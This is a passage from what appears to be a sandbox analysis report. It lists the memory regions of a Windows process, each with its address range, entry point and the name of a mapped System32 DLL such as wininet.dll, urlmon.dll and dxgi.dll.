"wininet.dll" filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll") Region: id = 905 start_va = 0x7ffc19980000 end_va = 0x7ffc19a06fff monitored = 0 entry_point = 0x7ffc1998cad0 region_type = mapped_file name = "inputswitch.dll" filename = "\\Windows\\System32\\InputSwitch.dll" (normalized: "c:\\windows\\system32\\inputswitch.dll") Region: id = 906 start_va = 0x7ffc19db0000 end_va = 0x7ffc19dbcfff monitored = 0 entry_point = 0x7ffc19db1df0 region_type = mapped_file name = "linkinfo.dll" filename = "\\Windows\\System32\\linkinfo.dll" (normalized: "c:\\windows\\system32\\linkinfo.dll") Region: id = 907 start_va = 0x7ffc19dc0000 end_va = 0x7ffc19dddfff monitored = 0 entry_point = 0x7ffc19dc1fa0 region_type = mapped_file name = "securityhealthproxystub.dll" filename = "\\Windows\\System32\\SecurityHealthProxyStub.dll" (normalized: "c:\\windows\\system32\\securityhealthproxystub.dll") Region: id = 908 start_va = 0x7ffc19e80000 end_va = 0x7ffc19e90fff monitored = 0 entry_point = 0x7ffc19e81af0 region_type = mapped_file name = "pcshellcommonproxystub.dll" filename = "\\Windows\\System32\\PCShellCommonProxyStub.dll" (normalized: "c:\\windows\\system32\\pcshellcommonproxystub.dll") Region: id = 909 start_va = 0x7ffc19ea0000 end_va = 0x7ffc19ec1fff monitored = 0 entry_point = 0x7ffc19eb5070 region_type = mapped_file name = "cldapi.dll" filename = "\\Windows\\System32\\cldapi.dll" (normalized: "c:\\windows\\system32\\cldapi.dll") Region: id = 910 start_va = 0x7ffc19ed0000 end_va = 0x7ffc19f8dfff monitored = 0 entry_point = 0x7ffc19ee3a80 region_type = mapped_file name = "windows.immersiveshell.serviceprovider.dll" filename = "\\Windows\\System32\\windows.immersiveshell.serviceprovider.dll" (normalized: "c:\\windows\\system32\\windows.immersiveshell.serviceprovider.dll") Region: id = 911 start_va = 0x7ffc1adf0000 end_va = 0x7ffc1aed2fff monitored = 0 entry_point = 0x7ffc1ae049e0 region_type = mapped_file name = "windows.applicationmodel.dll" filename = "\\Windows\\System32\\Windows.ApplicationModel.dll" (normalized: "c:\\windows\\system32\\windows.applicationmodel.dll") Region: id = 912 start_va = 0x7ffc1aee0000 end_va = 0x7ffc1b025fff monitored = 0 entry_point = 0x7ffc1aee7620 region_type = mapped_file name = "windows.staterepositoryps.dll" filename = "\\Windows\\System32\\Windows.StateRepositoryPS.dll" (normalized: "c:\\windows\\system32\\windows.staterepositoryps.dll") Region: id = 913 start_va = 0x7ffc1b3b0000 end_va = 0x7ffc1b3c0fff monitored = 0 entry_point = 0x7ffc1b3b3900 region_type = mapped_file name = "windows.staterepositorycore.dll" filename = "\\Windows\\System32\\Windows.StateRepositoryCore.dll" (normalized: "c:\\windows\\system32\\windows.staterepositorycore.dll") Region: id = 914 start_va = 0x7ffc1b520000 end_va = 0x7ffc1b529fff monitored = 0 entry_point = 0x7ffc1b521f00 region_type = mapped_file name = "mobilenetworking.dll" filename = "\\Windows\\System32\\mobilenetworking.dll" (normalized: "c:\\windows\\system32\\mobilenetworking.dll") Region: id = 915 start_va = 0x7ffc1b590000 end_va = 0x7ffc1b59ffff monitored = 0 entry_point = 0x7ffc1b5915e0 region_type = mapped_file name = "npmproxy.dll" filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll") Region: id = 916 start_va = 0x7ffc1b5c0000 end_va = 0x7ffc1b670fff monitored = 0 entry_point = 0x7ffc1b606e10 region_type = mapped_file name = "staterepository.core.dll" filename = "\\Windows\\System32\\StateRepository.Core.dll" (normalized: "c:\\windows\\system32\\staterepository.core.dll") Region: id = 917 start_va = 0x7ffc1b680000 end_va = 0x7ffc1bc05fff monitored = 0 entry_point = 0x7ffc1b6d7790 region_type = mapped_file name = "windows.staterepository.dll" filename = "\\Windows\\System32\\Windows.StateRepository.dll" (normalized: "c:\\windows\\system32\\windows.staterepository.dll") Region: id = 918 start_va = 0x7ffc1bc20000 end_va = 0x7ffc1bc4efff monitored = 0 entry_point = 0x7ffc1bc39ea0 region_type = mapped_file name = "storageusage.dll" filename = "\\Windows\\System32\\StorageUsage.dll" (normalized: "c:\\windows\\system32\\storageusage.dll") Region: id = 919 start_va = 0x7ffc1bc50000 end_va = 0x7ffc1bc63fff monitored = 0 entry_point = 0x7ffc1bc537a0 region_type = mapped_file name = "hcproviders.dll" filename = "\\Windows\\System32\\hcproviders.dll" (normalized: "c:\\windows\\system32\\hcproviders.dll") Region: id = 920 start_va = 0x7ffc1bc70000 end_va = 0x7ffc1bcc1fff monitored = 0 entry_point = 0x7ffc1bc83150 region_type = mapped_file name = "framedynos.dll" filename = "\\Windows\\System32\\framedynos.dll" (normalized: "c:\\windows\\system32\\framedynos.dll") Region: id = 921 start_va = 0x7ffc1bcd0000 end_va = 0x7ffc1bda8fff monitored = 0 entry_point = 0x7ffc1bcd53c0 region_type = mapped_file name = "werconcpl.dll" filename = "\\Windows\\System32\\werconcpl.dll" (normalized: "c:\\windows\\system32\\werconcpl.dll") Region: id = 922 start_va = 0x7ffc1bdb0000 end_va = 0x7ffc1bdc8fff monitored = 0 entry_point = 0x7ffc1bdb2110 region_type = mapped_file name = "wscui.cpl" filename = "\\Windows\\System32\\wscui.cpl" (normalized: "c:\\windows\\system32\\wscui.cpl") Region: id = 923 start_va = 0x7ffc1bdd0000 end_va = 0x7ffc1bf4ffff monitored = 0 entry_point = 0x7ffc1bdf7430 region_type = mapped_file name = "audioses.dll" filename = "\\Windows\\System32\\AudioSes.dll" (normalized: "c:\\windows\\system32\\audioses.dll") Region: id = 924 start_va = 0x7ffc1c030000 end_va = 0x7ffc1c131fff monitored = 0 entry_point = 0x7ffc1c0757d0 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 925 start_va = 0x7ffc1c140000 end_va = 0x7ffc1c173fff monitored = 0 entry_point = 0x7ffc1c162260 region_type = mapped_file name = "comppkgsup.dll" filename = "\\Windows\\System32\\CompPkgSup.dll" (normalized: "c:\\windows\\system32\\comppkgsup.dll") Region: id = 926 start_va = 0x7ffc1c180000 end_va = 0x7ffc1c1fcfff monitored = 0 entry_point = 0x7ffc1c183320 region_type = mapped_file name = "windows.media.devices.dll" filename = "\\Windows\\System32\\Windows.Media.Devices.dll" (normalized: "c:\\windows\\system32\\windows.media.devices.dll") Region: id = 927 start_va = 0x7ffc1c4c0000 end_va = 0x7ffc1c4d7fff monitored = 0 entry_point = 0x7ffc1c4c1360 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 928 start_va = 0x7ffc1c4e0000 end_va = 0x7ffc1c580fff monitored = 0 entry_point = 0x7ffc1c4e3970 region_type = mapped_file name = "portabledeviceapi.dll" filename = "\\Windows\\System32\\PortableDeviceApi.dll" (normalized: "c:\\windows\\system32\\portabledeviceapi.dll") Region: id = 929 start_va = 0x7ffc1c690000 end_va = 0x7ffc1c714fff monitored = 0 entry_point = 0x7ffc1c6b0b70 region_type = mapped_file name = "mmdevapi.dll" filename = "\\Windows\\System32\\MMDevAPI.dll" (normalized: "c:\\windows\\system32\\mmdevapi.dll") Region: id = 930 start_va = 0x7ffc1c7e0000 end_va = 0x7ffc1c849fff monitored = 0 entry_point = 0x7ffc1c7e2350 region_type = mapped_file name = "wlanapi.dll" filename = "\\Windows\\System32\\wlanapi.dll" (normalized: "c:\\windows\\system32\\wlanapi.dll") Region: id = 931 start_va = 0x7ffc1c990000 end_va = 0x7ffc1c9fbfff monitored = 0 entry_point = 0x7ffc1c9aec00 region_type = mapped_file name = "es.dll" filename = "\\Windows\\System32\\es.dll" (normalized: "c:\\windows\\system32\\es.dll") Region: id = 932 start_va = 0x7ffc1cb20000 end_va = 0x7ffc1cbcdfff monitored = 0 entry_point = 0x7ffc1cb6b570 region_type = mapped_file name = "textshaping.dll" filename = "\\Windows\\System32\\TextShaping.dll" (normalized: "c:\\windows\\system32\\textshaping.dll") Region: id = 933 start_va = 0x7ffc1d590000 end_va = 0x7ffc1d5acfff monitored = 0 entry_point = 0x7ffc1d5929b0 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 934 start_va = 0x7ffc1d5b0000 end_va = 0x7ffc1d5c6fff monitored = 0 entry_point = 0x7ffc1d5b24b0 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 935 start_va = 0x7ffc1d5d0000 end_va = 0x7ffc1d775fff monitored = 0 entry_point = 0x7ffc1d5ff1b0 region_type = mapped_file name = "windows.globalization.dll" filename = "\\Windows\\System32\\Windows.Globalization.dll" (normalized: "c:\\windows\\system32\\windows.globalization.dll") Region: id = 936 start_va = 0x7ffc1d780000 end_va = 0x7ffc1d9fdfff monitored = 0 entry_point = 0x7ffc1d8173a0 region_type = mapped_file name = "dwrite.dll" filename = "\\Windows\\System32\\DWrite.dll" (normalized: "c:\\windows\\system32\\dwrite.dll") Region: id = 937 start_va = 0x7ffc1da00000 end_va = 0x7ffc1dbecfff monitored = 0 entry_point = 0x7ffc1da7ea20 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\System32\\urlmon.dll" (normalized: "c:\\windows\\system32\\urlmon.dll") Region: id = 938 start_va = 0x7ffc1dbf0000 end_va = 0x7ffc1dd26fff monitored = 0 entry_point = 0x7ffc1dc13b60 region_type = mapped_file name = "windows.ui.immersive.dll" filename = "\\Windows\\System32\\Windows.UI.Immersive.dll" (normalized: "c:\\windows\\system32\\windows.ui.immersive.dll") Region: id = 939 start_va = 0x7ffc1dd30000 end_va = 0x7ffc1dfddfff monitored = 0 entry_point = 0x7ffc1dd669a0 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll") Region: id = 940 start_va = 0x7ffc1dfe0000 end_va = 0x7ffc1f09ffff monitored = 0 entry_point = 0x7ffc1e329f90 region_type = mapped_file name = "windows.ui.xaml.dll" filename = "\\Windows\\System32\\Windows.UI.Xaml.dll" (normalized: "c:\\windows\\system32\\windows.ui.xaml.dll") Region: id = 941 start_va = 0x7ffc1f0a0000 end_va = 0x7ffc1f0ccfff monitored = 0 entry_point = 0x7ffc1f0a7cd0 region_type = mapped_file name = "bcp47mrm.dll" filename = "\\Windows\\System32\\BCP47mrm.dll" (normalized: "c:\\windows\\system32\\bcp47mrm.dll") Region: id = 942 start_va = 0x7ffc1f0d0000 end_va = 0x7ffc1f0fcfff monitored = 0 entry_point = 0x7ffc1f0e7ec0 region_type = mapped_file name = "languageoverlayutil.dll" filename = "\\Windows\\System32\\LanguageOverlayUtil.dll" (normalized: "c:\\windows\\system32\\languageoverlayutil.dll") Region: id = 943 start_va = 0x7ffc1f100000 end_va = 0x7ffc1f250fff monitored = 0 entry_point = 0x7ffc1f118050 region_type = mapped_file name = "inputhost.dll" filename = "\\Windows\\System32\\InputHost.dll" (normalized: "c:\\windows\\system32\\inputhost.dll") Region: id = 944 start_va = 0x7ffc1f260000 end_va = 0x7ffc1f35bfff monitored = 0 entry_point = 0x7ffc1f29ae50 region_type = mapped_file name = "textinputframework.dll" filename = "\\Windows\\System32\\TextInputFramework.dll" (normalized: "c:\\windows\\system32\\textinputframework.dll") Region: id = 945 start_va = 0x7ffc1f360000 end_va = 0x7ffc1f4abfff monitored = 0 entry_point = 0x7ffc1f391ac0 region_type = mapped_file name = "windows.ui.dll" filename = "\\Windows\\System32\\Windows.UI.dll" (normalized: "c:\\windows\\system32\\windows.ui.dll") Region: id = 946 start_va = 0x7ffc1f4b0000 end_va = 0x7ffc1f5a3fff monitored = 0 entry_point = 0x7ffc1f4f1eb0 region_type = mapped_file name = "mrmcorer.dll" filename = "\\Windows\\System32\\MrmCoreR.dll" (normalized: "c:\\windows\\system32\\mrmcorer.dll") Region: id = 947 start_va = 0x7ffc1f5b0000 end_va = 0x7ffc1f5b9fff monitored = 0 entry_point = 0x7ffc1f5b1390 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 948 start_va = 0x7ffc1f5f0000 end_va = 0x7ffc1f649fff monitored = 0 entry_point = 0x7ffc1f6063c0 region_type = mapped_file name = "bcp47langs.dll" filename = "\\Windows\\System32\\BCP47Langs.dll" (normalized: "c:\\windows\\system32\\bcp47langs.dll") Region: id = 949 start_va = 0x7ffc1f650000 end_va = 0x7ffc1f6befff monitored = 0 entry_point = 0x7ffc1f65a850 region_type = mapped_file name = "wincorlib.dll" filename = "\\Windows\\System32\\wincorlib.dll" (normalized: "c:\\windows\\system32\\wincorlib.dll") Region: id = 950 start_va = 0x7ffc1f6d0000 end_va = 0x7ffc1f6fcfff monitored = 0 entry_point = 0x7ffc1f6d5010 region_type = mapped_file name = "settingmonitor.dll" filename = "\\Windows\\System32\\SettingMonitor.dll" (normalized: "c:\\windows\\system32\\settingmonitor.dll") Region: id = 951 start_va = 0x7ffc1f700000 end_va = 0x7ffc1f730fff monitored = 0 entry_point = 0x7ffc1f702590 region_type = mapped_file name = "portabledevicetypes.dll" filename = "\\Windows\\System32\\PortableDeviceTypes.dll" (normalized: "c:\\windows\\system32\\portabledevicetypes.dll") Region: id = 952 start_va = 0x7ffc1f970000 end_va = 0x7ffc1f9b5fff monitored = 0 entry_point = 0x7ffc1f9727a0 region_type = mapped_file name = "bthprops.cpl" filename = "\\Windows\\System32\\bthprops.cpl" (normalized: "c:\\windows\\system32\\bthprops.cpl") Region: id = 953 start_va = 0x7ffc1f9d0000 end_va = 0x7ffc1fa62fff monitored = 0 entry_point = 0x7ffc1f9d9e10 region_type = mapped_file name = "policymanager.dll" filename = "\\Windows\\System32\\policymanager.dll" (normalized: "c:\\windows\\system32\\policymanager.dll") Region: id = 954 start_va = 0x7ffc1fb40000 end_va = 0x7ffc1fb93fff monitored = 0 entry_point = 0x7ffc1fb4dee0 region_type = mapped_file name = "usermgrproxy.dll" filename = "\\Windows\\System32\\UserMgrProxy.dll" (normalized: "c:\\windows\\system32\\usermgrproxy.dll") Region: id = 955 start_va = 0x7ffc1fba0000 end_va = 0x7ffc1fc97fff monitored = 0 entry_point = 0x7ffc1fbb73e0 region_type = mapped_file name = "appxdeploymentclient.dll" filename = "\\Windows\\System32\\AppXDeploymentClient.dll" (normalized: "c:\\windows\\system32\\appxdeploymentclient.dll") Region: id = 956 start_va = 0x7ffc1fce0000 end_va = 0x7ffc1fd1afff monitored = 0 entry_point = 0x7ffc1fd01b10 region_type = mapped_file name = "dxcore.dll" filename = "\\Windows\\System32\\DXCore.dll" (normalized: "c:\\windows\\system32\\dxcore.dll") Region: id = 957 start_va = 0x7ffc1fd20000 end_va = 0x7ffc20415fff monitored = 0 entry_point = 0x7ffc202bec40 region_type = mapped_file name = "d3d10warp.dll" filename = "\\Windows\\System32\\d3d10warp.dll" (normalized: "c:\\windows\\system32\\d3d10warp.dll") Region: id = 958 start_va = 0x7ffc20510000 end_va = 0x7ffc20528fff monitored = 0 entry_point = 0x7ffc205151e0 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 959 start_va = 0x7ffc20560000 end_va = 0x7ffc205c4fff monitored = 0 entry_point = 0x7ffc20573640 region_type = mapped_file name = "wevtapi.dll" filename = "\\Windows\\System32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll") Region: id = 960 start_va = 0x7ffc207d0000 end_va = 0x7ffc2086ffff monitored = 0 entry_point = 0x7ffc207d4570 region_type = mapped_file name = "actxprxy.dll" filename = "\\Windows\\System32\\actxprxy.dll" (normalized: "c:\\windows\\system32\\actxprxy.dll") Region: id = 961 start_va = 0x7ffc20a50000 end_va = 0x7ffc20a8cfff monitored = 0 entry_point = 0x7ffc20a5b030 region_type = mapped_file name = "netprofm.dll" filename = "\\Windows\\System32\\netprofm.dll" (normalized: "c:\\windows\\system32\\netprofm.dll") Region: id = 962 start_va = 0x7ffc20c00000 end_va = 0x7ffc20c15fff monitored = 0 entry_point = 0x7ffc20c04250 region_type = mapped_file name = "usermgrcli.dll" filename = "\\Windows\\System32\\usermgrcli.dll" (normalized: "c:\\windows\\system32\\usermgrcli.dll") Region: id = 963 start_va = 0x7ffc20d20000 end_va = 0x7ffc20d30fff monitored = 0 entry_point = 0x7ffc20d23670 region_type = mapped_file name = "wmiclnt.dll" filename = "\\Windows\\System32\\wmiclnt.dll" (normalized: "c:\\windows\\system32\\wmiclnt.dll") Region: id = 964 start_va = 0x7ffc20e60000 end_va = 0x7ffc215f0fff monitored = 0 entry_point = 0x7ffc20e75f30 region_type = mapped_file name = "onecoreuapcommonproxystub.dll" filename = "\\Windows\\System32\\OneCoreUAPCommonProxyStub.dll" (normalized: "c:\\windows\\system32\\onecoreuapcommonproxystub.dll") Region: id = 965 start_va = 0x7ffc216b0000 end_va = 0x7ffc216c0fff monitored = 0 entry_point = 0x7ffc216b6a80 region_type = mapped_file name = "coloradapterclient.dll" filename = "\\Windows\\System32\\coloradapterclient.dll" (normalized: "c:\\windows\\system32\\coloradapterclient.dll") Region: id = 966 start_va = 0x7ffc216d0000 end_va = 0x7ffc2177dfff monitored = 0 entry_point = 0x7ffc216db110 region_type = mapped_file name = "mscms.dll" filename = "\\Windows\\System32\\mscms.dll" (normalized: "c:\\windows\\system32\\mscms.dll") Region: id = 967 start_va = 0x7ffc217f0000 end_va = 0x7ffc21836fff monitored = 0 entry_point = 0x7ffc218030b0 region_type = mapped_file name = "uianimation.dll" filename = "\\Windows\\System32\\UIAnimation.dll" (normalized: "c:\\windows\\system32\\uianimation.dll") Region: id = 968 start_va = 0x7ffc21840000 end_va = 0x7ffc219f3fff monitored = 0 entry_point = 0x7ffc218b68b0 region_type = mapped_file name = "windowscodecs.dll" filename = "\\Windows\\System32\\WindowsCodecs.dll" (normalized: "c:\\windows\\system32\\windowscodecs.dll") Region: id = 969 start_va = 0x7ffc21b00000 end_va = 0x7ffc21d01fff monitored = 0 entry_point = 0x7ffc21b6d800 region_type = mapped_file name = "twinapi.appcore.dll" filename = "\\Windows\\System32\\twinapi.appcore.dll" (normalized: "c:\\windows\\system32\\twinapi.appcore.dll") Region: id = 970 start_va = 0x7ffc21d10000 end_va = 0x7ffc21db0fff monitored = 0 entry_point = 0x7ffc21d201b0 region_type = mapped_file name = "windowmanagementapi.dll" filename = "\\Windows\\System32\\WindowManagementAPI.dll" (normalized: "c:\\windows\\system32\\windowmanagementapi.dll") Region: id = 971 start_va = 0x7ffc21dc0000 end_va = 0x7ffc21e29fff monitored = 0 entry_point = 0x7ffc21dc8c30 region_type = mapped_file name = "ninput.dll" filename = "\\Windows\\System32\\ninput.dll" (normalized: "c:\\windows\\system32\\ninput.dll") Region: id = 972 start_va = 0x7ffc22080000 end_va = 0x7ffc22089fff monitored = 0 entry_point = 0x7ffc22081780 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 973 start_va = 0x7ffc22090000 end_va = 0x7ffc220acfff monitored = 0 entry_point = 0x7ffc22096d40 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll") Region: id = 974 start_va = 0x7ffc22310000 end_va = 0x7ffc22345fff monitored = 0 entry_point = 0x7ffc2231f5a0 region_type = mapped_file name = "xmllite.dll" filename = "\\Windows\\System32\\xmllite.dll" (normalized: "c:\\windows\\system32\\xmllite.dll") Region: id = 975 start_va = 0x7ffc227b0000 end_va = 0x7ffc22a12fff monitored = 0 entry_point = 0x7ffc2282b0b0 region_type = mapped_file name = "d3d11.dll" filename = "\\Windows\\System32\\d3d11.dll" (normalized: "c:\\windows\\system32\\d3d11.dll") Region: id = 976 start_va = 0x7ffc22a20000 end_va = 0x7ffc22fdffff monitored = 0 entry_point = 0x7ffc22af9920 region_type = mapped_file name = "d2d1.dll" filename = "\\Windows\\System32\\d2d1.dll" (normalized: "c:\\windows\\system32\\d2d1.dll") Region: id = 977 start_va = 0x7ffc22fe0000 end_va = 0x7ffc23135fff monitored = 0 entry_point = 0x7ffc2300b240 region_type = mapped_file name = "wintypes.dll" filename = "\\Windows\\System32\\WinTypes.dll" (normalized: "c:\\windows\\system32\\wintypes.dll") Region: id = 978 start_va = 0x7ffc23140000 end_va = 0x7ffc23324fff monitored = 0 entry_point = 0x7ffc2319ddd0 region_type = mapped_file name = "dcomp.dll" filename = "\\Windows\\System32\\dcomp.dll" (normalized: "c:\\windows\\system32\\dcomp.dll") Region: id = 979 start_va = 0x7ffc236b0000 end_va = 0x7ffc23a09fff monitored = 0 entry_point = 0x7ffc23732d50 region_type = mapped_file name = "coreuicomponents.dll" filename = "\\Windows\\System32\\CoreUIComponents.dll" (normalized: "c:\\windows\\system32\\coreuicomponents.dll") Region: id = 980 start_va = 0x7ffc23a10000 end_va = 0x7ffc23b01fff monitored = 0 entry_point = 0x7ffc23a670f0 region_type = mapped_file name = "coremessaging.dll" filename = "\\Windows\\System32\\CoreMessaging.dll" (normalized: "c:\\windows\\system32\\coremessaging.dll") Region: id = 981 start_va = 0x7ffc23c40000 end_va = 0x7ffc23d34fff monitored = 0 entry_point = 0x7ffc23c82860 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 982 start_va = 0x7ffc23d40000 end_va = 0x7ffc23d63fff monitored = 0 entry_point = 0x7ffc23d43de0 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 983 start_va = 0x7ffc23d80000 end_va = 0x7ffc23d94fff monitored = 0 entry_point = 0x7ffc23d829c0 region_type = mapped_file name = "wpdshserviceobj.dll" filename = "\\Windows\\System32\\WPDShServiceObj.dll" (normalized: "c:\\windows\\system32\\wpdshserviceobj.dll") Region: id = 984 start_va = 0x7ffc23da0000 end_va = 0x7ffc23db3fff monitored = 0 entry_point = 0x7ffc23da28c0 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 985 start_va = 0x7ffc23dc0000 end_va = 0x7ffc23eeffff monitored = 0 entry_point = 0x7ffc23e5dcf0 region_type = mapped_file name = "dsreg.dll" filename = "\\Windows\\System32\\dsreg.dll" (normalized: "c:\\windows\\system32\\dsreg.dll") Region: id = 986 start_va = 0x7ffc23f00000 end_va = 0x7ffc23f10fff monitored = 0 entry_point = 0x7ffc23f06910 region_type = mapped_file name = "dusmapi.dll" filename = "\\Windows\\System32\\dusmapi.dll" (normalized: "c:\\windows\\system32\\dusmapi.dll") Region: id = 987 start_va = 0x7ffc23f20000 end_va = 0x7ffc23f53fff monitored = 0 entry_point = 0x7ffc23f3f490 region_type = mapped_file name = "ethernetmediamanager.dll" filename = "\\Windows\\System32\\EthernetMediaManager.dll" (normalized: "c:\\windows\\system32\\ethernetmediamanager.dll") Region: id = 988 start_va = 0x7ffc23f60000 end_va = 0x7ffc23fccfff monitored = 0 entry_point = 0x7ffc23f86a60 region_type = mapped_file name = "networkuxbroker.dll" filename = "\\Windows\\System32\\NetworkUXBroker.dll" (normalized: "c:\\windows\\system32\\networkuxbroker.dll") Region: id = 989 start_va = 0x7ffc23fd0000 end_va = 0x7ffc2405ffff monitored = 0 entry_point = 0x7ffc23fe0880 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\System32\\apphelp.dll" (normalized: "c:\\windows\\system32\\apphelp.dll") Region: id = 990 start_va = 0x7ffc240a0000 end_va = 0x7ffc2413efff monitored = 0 entry_point = 0x7ffc240c9120 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 991 start_va = 0x7ffc24160000 end_va = 0x7ffc24173fff monitored = 0 entry_point = 0x7ffc24164280 region_type = mapped_file name = "resourcepolicyclient.dll" filename = "\\Windows\\System32\\ResourcePolicyClient.dll" (normalized: "c:\\windows\\system32\\resourcepolicyclient.dll") Region: id = 992 start_va = 0x7ffc24270000 end_va = 0x7ffc24348fff monitored = 0 entry_point = 0x7ffc242c7a70 region_type = mapped_file name = "wer.dll" filename = "\\Windows\\System32\\wer.dll" (normalized: "c:\\windows\\system32\\wer.dll") Region: id = 993 start_va = 0x7ffc24350000 end_va = 0x7ffc24379fff monitored = 0 entry_point = 0x7ffc24359e30 region_type = mapped_file name = "rmclient.dll" filename = "\\Windows\\System32\\rmclient.dll" (normalized: "c:\\windows\\system32\\rmclient.dll") Region: id = 994 start_va = 0x7ffc24450000 end_va = 0x7ffc24462fff monitored = 0 entry_point = 0x7ffc24453f60 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 995 start_va = 0x7ffc244c0000 end_va = 0x7ffc244edfff monitored = 0 entry_point = 0x7ffc244c42d0 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 996 start_va = 0x7ffc24760000 end_va = 0x7ffc24ee9fff monitored = 0 entry_point = 0x7ffc2491c050 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 997 start_va = 0x7ffc24f30000 end_va = 0x7ffc25022fff monitored = 0 entry_point = 0x7ffc24f544d0 region_type = mapped_file name = "dxgi.dll" filename = "\\Windows\\System32\\dxgi.dll" (normalized: "c:\\windows\\system32\\dxgi.dll") Region: id = 998 start_va = 0x7ffc25030000 end_va = 0x7ffc2514afff monitored = 0 entry_point = 0x7ffc2503c250 region_type = mapped_file name = "tdh.dll" filename = "\\Windows\\System32\\tdh.dll" (normalized: "c:\\windows\\system32\\tdh.dll") Region: id = 999 start_va = 0x7ffc25180000 end_va = 0x7ffc251a4fff monitored = 0 entry_point = 0x7ffc25183920 region_type = mapped_file name = "sppc.dll" filename = "\\Windows\\System32\\sppc.dll" (normalized: "c:\\windows\\system32\\sppc.dll") Region: id = 1000 start_va = 0x7ffc251b0000 end_va = 0x7ffc251d8fff monitored = 0 entry_point = 0x7ffc251b1bd0 region_type = mapped_file name = "slc.dll" filename = "\\Windows\\System32\\slc.dll" (normalized: "c:\\windows\\system32\\slc.dll") Region: id = 1001 start_va = 0x7ffc25440000 end_va = 0x7ffc25472fff monitored = 0 entry_point = 0x7ffc25446930 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 1002 start_va = 0x7ffc25480000 end_va = 0x7ffc254a8fff monitored = 0 entry_point = 0x7ffc25489780 region_type = mapped_file name = "profext.dll" filename = "\\Windows\\System32\\profext.dll" (normalized: "c:\\windows\\system32\\profext.dll") Region: id = 1003 start_va = 0x7ffc25670000 end_va = 0x7ffc256a3fff monitored = 0 entry_point = 0x7ffc25676e70 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 1004 start_va = 0x7ffc25710000 end_va = 0x7ffc25799fff monitored = 0 entry_point = 0x7ffc25755870 region_type = mapped_file name = "msvcp110_win.dll" filename = "\\Windows\\System32\\msvcp110_win.dll" (normalized: "c:\\windows\\system32\\msvcp110_win.dll") Region: id = 1005 start_va = 0x7ffc257a0000 end_va = 0x7ffc257b6fff monitored = 0 entry_point = 0x7ffc257a1d60 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 1006 start_va = 0x7ffc259d0000 end_va = 0x7ffc25a0afff monitored = 0 entry_point = 0x7ffc259da620 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 1007 start_va = 0x7ffc25a10000 end_va = 0x7ffc25a1bfff monitored = 0 entry_point = 0x7ffc25a11ce0 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 1008 start_va = 0x7ffc25eb0000 end_va = 0x7ffc25ec7fff monitored = 0 entry_point = 0x7ffc25eb4aa0 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 1009 start_va = 0x7ffc25ed0000 end_va = 0x7ffc25edbfff monitored = 0 entry_point = 0x7ffc25ed2200 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 1010 start_va = 0x7ffc25f60000 end_va = 0x7ffc25fb9fff monitored = 0 entry_point = 0x7ffc25f6b770 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 1011 start_va = 0x7ffc25fc0000 end_va = 0x7ffc25feafff monitored = 0 entry_point = 0x7ffc25fc2db0 